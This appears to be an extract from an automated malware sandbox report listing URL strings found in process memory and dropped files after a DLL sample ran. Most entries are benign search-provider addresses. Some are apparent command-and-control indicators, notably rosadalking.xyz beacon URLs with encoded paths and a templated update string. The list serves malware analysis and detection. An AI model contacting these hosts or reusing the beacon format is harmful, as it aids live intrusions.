            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://cnet.search.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
            Source: powershell.exe, 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp, explorer.exe, 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp, control.exe, 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
            Source: powershell.exe, 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp, explorer.exe, 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp, control.exe, 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
            Source: explorer.exe, 00000025.00000002.641097110.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: 5fd9d7ec9e7aetar.dllString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
            Source: 5fd9d7ec9e7aetar.dllString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
            Source: explorer.exe, 00000025.00000002.641097110.0000000003767000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?aa4ec0d4b8242
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://es.ask.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://find.joins.com/
            Source: ~DF224E930954C99BCE.TMP.4.dr, {CB1D97FB-3FD1-11EB-90E5-ECF4BB570DC9}.dat.4.drString found in binary or memory: http://firestore.googleapis.com/images/5gl1_2BhlXsWr7coQSs/4F845jkaqRiUCXeQicZCJl/ANd4nGixTqMmg/W9Sd
            Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
            Source: powershell.exe, 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp, explorer.exe, 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp, control.exe, 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
            Source: powershell.exe, 0000001C.00000002.495468052.00000224A0A41000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
            Source: 5fd9d7ec9e7aetar.dllString found in binary or memory: http://ocsp.sectigo.com0
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
            Source: powershell.exe, 0000001C.00000002.477701499.0000022490BF0000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
            Source: imagestore.dat.21.drString found in binary or memory: http://rosadalking.xyz/favicon.ico
            Source: imagestore.dat.21.drString found in binary or memory: http://rosadalking.xyz/favicon.ico~
            Source: {F0C73B59-3FD1-11EB-90E5-ECF4BB570DC9}.dat.21.drString found in binary or memory: http://rosadalking.xyz/images/3U_2B2PC7eNms4Rfw/m2bayU1bYGRN/mfyZR8juil8/5WDNQcansH_2FP/bNCVxlxtGYDs
            Source: explorer.exe, 00000025.00000000.438799794.0000000001640000.00000002.00000001.sdmpString found in binary or memory: http://rosadalking.xyz/images/7fyxdgE16Wzc/NTp3KYRnq_2/FfVuj_2BgOC9g9/ypxwvUsxP_2BjRv4IoOGY/ls8
            Source: {F0C73B5B-3FD1-11EB-90E5-ECF4BB570DC9}.dat.21.drString found in binary or memory: http://rosadalking.xyz/images/7fyxdgE16Wzc/NTp3KYRnq_2/FfVuj_2BgOC9g9/ypxwvUsxP_2BjRv4IoOGY/ls8cRjS9
            Source: loaddll32.exe, 00000000.00000003.375700561.00000000015B7000.00000004.00000001.sdmp, explorer.exe, 00000025.00000000.449476273.0000000005509000.00000004.00000001.sdmp, ~DF907A0632D9B8351A.TMP.21.dr, {F0C73B57-3FD1-11EB-90E5-ECF4BB570DC9}.dat.21.drString found in binary or memory: http://rosadalking.xyz/images/PyPG1445hl/46EQl_2BHA_2B7TdC/2kCm72bEjNb0/BR1CjGRrQcU/b_2BmaLHUOoKmw/x
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
            Source: powershell.exe, 0000001C.00000002.476825064.00000224909E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
            Source: explorer.exe, 00000025.00000000.450828486.00000000066A0000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
            Source: explorer.exe, 00000025.00000000.450828486.00000000066A0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
            Source: msapplication.xml.4.drString found in binary or memory: http://www.amazon.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 0000001C.00000002.477701499.0000022490BF0000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
